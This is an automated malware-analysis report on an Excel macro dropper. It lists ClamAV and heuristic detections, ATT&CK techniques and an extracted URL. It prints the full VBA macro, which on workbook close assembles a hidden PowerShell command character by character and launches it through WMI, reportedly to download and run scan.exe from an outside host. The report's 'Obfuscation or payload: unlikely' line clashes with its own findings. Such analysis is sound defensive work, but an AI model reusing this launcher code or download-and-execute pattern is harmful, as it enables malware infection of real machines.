MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The file is detected as Xls.Dropper.Agent-7867607-0 by ClamAV, indicating it is a malicious dropper. The VBA macro contains obfuscated code that, when deobfuscated, constructs a PowerShell command to download a file from 'http://kremlin-malwrhunterteam.info/scan.exe' and save it as 'scan.exe' in the user's AppData directory. It then executes the downloaded file, likely establishing persistence via a Run key.
Heuristics 4
-
ClamAV: Xls.Dropper.Agent-7867607-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7867607-0
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://kremlin-malwrhunterteam.info/scan.exe In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2117 bytes |
SHA-256: 5f0cc36101e8332575253cc18c90f846906be14d760b65090cb53fbf58aadfb1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
v = Worksheets(1).Range("B100").Text
xn = "Po" & YZdlk.c6() & YZdlk.c3() & YZdlk.c2() & YZdlk.c11() & "h" & YZdlk.c3() & "ll " & "-w h " & v
YZdlk.rtghgfhjhg (xn)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "YZdlk"
Attribute VB_Base = "0{CE07A86C-16A1-47B6-A570-04C3F4A72004}{FC230AB9-13AB-43BE-8F28-9C10541F4B24}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function rtghgfhjhg(fgfjhfgfg As String)
Set sJECL = CreateObject(TC2())
Set BolVxh = sJECL.Methods_(TC()). _
InParameters.SpawnInstance_
BolVxh.CommandLine = fgfjhfgfg
BolVxh.ProcessStartupInformation = FauPn
Set jLNYomB = sJECL.ExecMethod_(TC(), BolVxh)
End Function
Function TC()
TC = c1 & c2 & c3 & c4 & c5 & c3
End Function
Function TC2()
TC2 = c6 & c7 & c8 & c9 & c10 & c9 & c5 & c11 & ":" & c6 & c7 & c8 & "32_" & "Process"
End Function
Function c1()
c1 = "c"
End Function
Function c2()
c2 = "r"
End Function
Function c3()
c3 = "e"
End Function
Function c4()
c4 = "a"
End Function
Function c5()
c5 = "t"
End Function
Function c6()
c6 = "w"
End Function
Function c7()
c7 = "i"
End Function
Function c8()
c8 = "n"
End Function
Function c9()
c9 = "m"
End Function
Function c10()
c10 = "g"
End Function
Function c11()
c11 = "s"
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 17920 bytes |
SHA-256: 5b46c7787d8d853aa02cb263ac55c60e7f554ea2713a34183aa0ad33376baad2 |
|||
|
Detection
ClamAV:
Xls.Dropper.Agent-7867607-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.